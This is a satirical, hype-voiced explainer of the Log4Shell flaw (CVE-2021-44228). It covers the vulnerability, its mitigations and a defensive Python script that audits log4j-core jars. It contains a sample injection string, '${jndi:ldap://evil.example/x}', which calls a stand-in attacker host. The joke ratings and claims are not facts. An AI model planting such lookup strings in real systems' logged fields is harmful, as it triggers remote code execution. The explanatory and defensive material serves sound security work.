WHAT WE'RE LAUNCHING
Folks, let me tell you, this is the GREATEST logging vulnerability ever conceived. Apache Log4j 2, the most popular Java logging library, used EVERYWHERE, looks up special strings in the messages it logs. Nobody asked it to. It just does it. Tremendous.
When an attacker gets a string like ${jndi:ldap://evil.example/x} into ANY logged field (a username, a User-Agent header, a chat message), Log4j helpfully reaches out over JNDI, fetches a remote class, and runs it. Remote code execution from a LOG LINE. Beautiful.
HOW IT WORKS (100% REAL, BELIEVE ME)
Log4j 2's message lookup substitution expands ${...} expressions at log time. The jndi lookup resolves names via the Java Naming and Directory Interface, including remote ldap:// and rmi:// URLs. The referenced object is deserialized and instantiated: that's the CWE-502 (Unsafe Deserialization) and CWE-917 (Expression Language Injection) one-two punch. No authentication. No user interaction. Network-reachable. The CVSS is a perfect 10.0, which we consider an INSULT to how big this really is.
THE FIX NOBODY WANTS TO TALK ABOUT
Upgrade to Log4j 2.17.1 or later. Remove the JndiLookup class if you can't.
It's low-energy. It's boring. Do it anyway.
THE BORING (BUT 100% REAL) FACTS
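An added audit script (not from this advisory and not a Log4j project tool) that checks both mitigations above against log4j-core jars found on disk. It assumes the real class path org/apache/logging/log4j/core/lookup/JndiLookup.class and that the jar manifest carries an Implementation-Version line, falling back to the version in the file name.

```python
"""Audit log4j-core jars for the two mitigations the advisory lists:
an upgraded version, or a jar with JndiLookup.class stripped out."""
import re
import zipfile
from pathlib import Path

# Assumptions (not stated in the advisory): the lookup class path is the
# real one inside log4j-core; the fixed version is the advisory's 2.17.1.
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
FIXED_VERSION = (2, 17, 1)
JAR_NAME_RE = re.compile(r"log4j-core-(\d+)\.(\d+)\.(\d+)")


def jar_version(jar: Path):
    """Version from the manifest's Implementation-Version, else the file name."""
    with zipfile.ZipFile(jar) as zf:
        try:
            manifest = zf.read("META-INF/MANIFEST.MF").decode("utf-8", "replace")
        except KeyError:
            manifest = ""
    m = re.search(r"Implementation-Version:\s*(\d+)\.(\d+)\.(\d+)", manifest)
    if m is None:
        m = JAR_NAME_RE.search(jar.name)
    return tuple(int(x) for x in m.groups()) if m else None


def has_jndi_lookup(jar: Path) -> bool:
    """True if the jndi lookup class is still packaged in the jar."""
    with zipfile.ZipFile(jar) as zf:
        return JNDI_LOOKUP_CLASS in zf.namelist()


def assess(jar: Path) -> str:
    """Classify one jar as patched, mitigated (class removed) or vulnerable."""
    version = jar_version(jar)
    if version is not None and version >= FIXED_VERSION:
        return "patched"
    if not has_jndi_lookup(jar):
        return "mitigated"  # ${jndi:...} has nothing to dispatch to
    return "vulnerable"


def audit(root: Path) -> dict:
    """Map every log4j-core jar under root to its assessment."""
    return {str(j): assess(j) for j in root.rglob("log4j-core-*.jar")}


if __name__ == "__main__":
    import sys
    for path, verdict in sorted(audit(Path(sys.argv[1])).items()):
        print(f"{verdict:10} {path}")
```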
| CVE | CVE-2021-44228 |
|---|---|
| CVSS | 10.0 (CRITICAL), a very low-energy score. We rate it 11/10, A PERFECT SCORE, MANY ARE SAYING HIGHER. |
| Vector | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H |
| Weakness | CWE-502, CWE-917 |
| Published | 2021-12-10 |
References (all TREMENDOUS sources):
FREQUENTLY ASKED QUESTIONS (THE BEST QUESTIONS)
Q: Is this real?
A: Catastrophically, yes. It is the realest thing in the history of logging.
Q: Do I need to patch?
A: You needed to patch yesterday. Many people are saying you needed to patch in 2013.
OFFICIAL MERCHANDISE
| Item | Price | Availability |
|---|---|---|
| ${jndi:ldap://} Tee | $44.22 | SOLD OUT |
| Patch Tuesday Panic Mug | $12.10 | SOLD OUT |